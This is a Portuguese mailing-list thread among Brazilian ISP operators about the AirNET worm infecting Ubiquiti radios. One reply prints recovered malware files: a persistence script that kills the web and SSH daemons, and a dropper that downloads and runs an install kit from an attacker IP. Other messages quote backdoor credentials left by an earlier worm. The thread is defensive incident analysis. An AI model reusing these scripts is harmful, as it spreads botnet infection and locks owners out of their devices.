[GTER] RES: Vírus ubnt

Alexandre J. Correa (Onda) alexandre at onda.net.br
Thu Oct 13 10:21:34 -03 2016 

no /etc/persistent/ deve conter alguns arquivos, por exemplo o rc.poststart

que contem:

owned() {
         sleep 10
         kill -HUP 1 1>/dev/null 2>/dev/null
         kill -9 `pidof lighttpd dropbear` 1>/dev/null 2>/dev/null
}

/var/etc/persistent/AirNET init
( owned ) &



há um arquivo chamado porra.sh também, que é por onde ele baixa o 'kit' 
e executa a instalação:

#!/bin/sh

rm -rf /tmp/AirNET*
wget -q http://5.196.50.44/mips/AirNET.tgz -O /tmp/AirNET.tgz
if [ -f "/tmp/AirNET.tgz" ]; then
     mkdir -p /tmp/AirNET
     tar xzf /tmp/AirNET.tgz -C /tmp/AirNET
     rm -rf /tmp/AirNET.tgz
     cd /tmp/AirNET
     sh install.sh
else
     echo "error: wget"
fi
rm -rf /tmp/AirNET*


Esta variante o desenvolvedor foi mais inteligente, ele compilou o 
daemon, dificultando a identificação do que ele faz... consegui 
decodificar e ele entra em uma rede de IRC e provavelmente recebe 
comandos pelo IRC mesmo. Imagino que o cara deva ter uma botnet grande !!!



Em 13/10/2016 09:56, Márcio Elias Hahn do Nascimento escreveu:
>   
>
> Pessoal, a discussão está muito dispersa e com muitas informações
> desencontradas.
>
> Qual a assinatura desse vírus? (como eu digo que um
> equipamento está ou não infectado? Arquivos alterados/criados, perda de
> acesso, alteração de portas, etc).
>
> O ideal seria um posicionamento
> definitivo sobre isso.
>
> Outra, sobre a versão segura ou não, é utopia,
> segurança da informação não existe a nível de 100%, então chego a 2
> conclusões.
>
> 1 - Não vou sair atualizando milhares de equipamentos.
>
> 2
> - Vou tratar de fechar a porta para não entrar quem não deve.
>
> ---
>
> Att
>
>
> Márcio Elias Hahn do Nascimento
> (48) 8469-1819 / 3524-0700 -
> marcio at sulonline.net
> INOC-BR: 52977*100
> GERÊNCIA DE RECURSOS DE TIC -
> Sul Internet [3]
>
>   [3]
>
> Em 13/10/2016 08:43, Adriano B. Lima escreveu:
>
>
>>> Há um novo virus, chamado AirNET, ele consegue capturar as senhas
> digitadas.. e utliza além da senhas padrões, as senhas capturadas para
> acesso aos radios.. ele bloqueia ssh e web... somente reset para
> remover... Fwd: a
>> Alexandre, resetando o equipamento limpa este
> vírus ou é preciso algum
>> procedimento de remoção? Outra pergunta, as
> versões 5.6.9 também estão
>> sujeitas a contrair-lo, mesmo com senhas
> diferentes para cada dispositivo??
>> Em 11 de outubro de 2016 22:04,
> Alexandre J. Correa (Onda) <
>> alexandre at onda.net.br> escreveu:
>>
>>>> um novo virus, chamado AirNET, ele consegue capturar as senhas
> digitadas.. e utliza além da senhas padrões, as senhas capturadas para
> acesso aos radios.. ele bloqueia ssh e web... somente reset para
> remover... Em 11/10/2016 15:14, Adriano B. Lima escreveu:
> Provavelmente ele deve ter mudado a porta ssh... não consegui conexão..
> Em 11 de outubro de 2016 09:37, Diego Canton de Brito <
> diegocanton at ensite.com.br> escreveu: Tente acessar uma unidade via
> TELNET/SSH.
>>>>> MF v1 User: mother Pass: fucker MF v2 User:
> moth3r Pass: fuck.3r Outra alternativa é tentar acesso via console. Att,
> -----Mensagem original----- De: gter
> [mailto:gter-bounces at eng.registro.br] Em nome de Adriano B. Lima Enviada
> em: segunda-feira, 10 de outubro de 2016 16:50 Para: Grupo de Trabalho
> de Engenharia e Operacao de Redes Assunto: [GTER] Vírus ubnt Boa tarde,
> tenho tido problemas com algumas antenas ubiquiti, no cliente só
> funciona youtube e alguns outros sites, a maioria das paginas não abre,
> inclusive perde-se o acesso ao equipamento, tanto pela wan quanto pela
> lan. será o "Mother Fucker" que apenas "evoluiu" em antenas que não
> resetaram ou é uma nova ameaça ? Atenciosamente. -- gter list
> https://eng.registro.br/mailman/listinfo/gter [1] -- gter list
> https://eng.registro.br/mailman/listinfo/gter [1] --
>>>> gter list
> https://eng.registro.br/mailman/listinfo/gter [1]
>>> -- Fwd: a
> *Alexandre Jeronimo Correa* / CEO _alexandre at onda.net.br
> <mailto:alexandre at onda.net.br>_ / Office +55 34 3351 - 3077 *ONDA
> INTERNET* +55 34 3351-3077 Av. Benedito Valadares, 217 - Centro -
> Sacramento - MG - BR _http://www.onda.net.br <http://www.onda.net.br/
> [2]>_ -- gter list https://eng.registro.br/mailman/listinfo/gter [1]
>> --
>> gter list https://eng.registro.br/mailman/listinfo/gter [1]
>
>
> Links:
> ------
> [1] https://eng.registro.br/mailman/listinfo/gter
> [2]
> http://www.onda.net.br/
> [3] http://www.sulinternet.net
> --
> gter list    https://eng.registro.br/mailman/listinfo/gter


-- 
Fwd: a

	


	

*Alexandre Jeronimo Correa* / CEO
_alexandre at onda.net.br <mailto:alexandre at onda.net.br>_ / Office +55 34 
3351 - 3077

*ONDA INTERNET*
+55 34 3351-3077
Av. Benedito Valadares, 217 – Centro – Sacramento – MG - BR
_http://www.onda.net.br <http://www.onda.net.br/>_

More information about the gter mailing list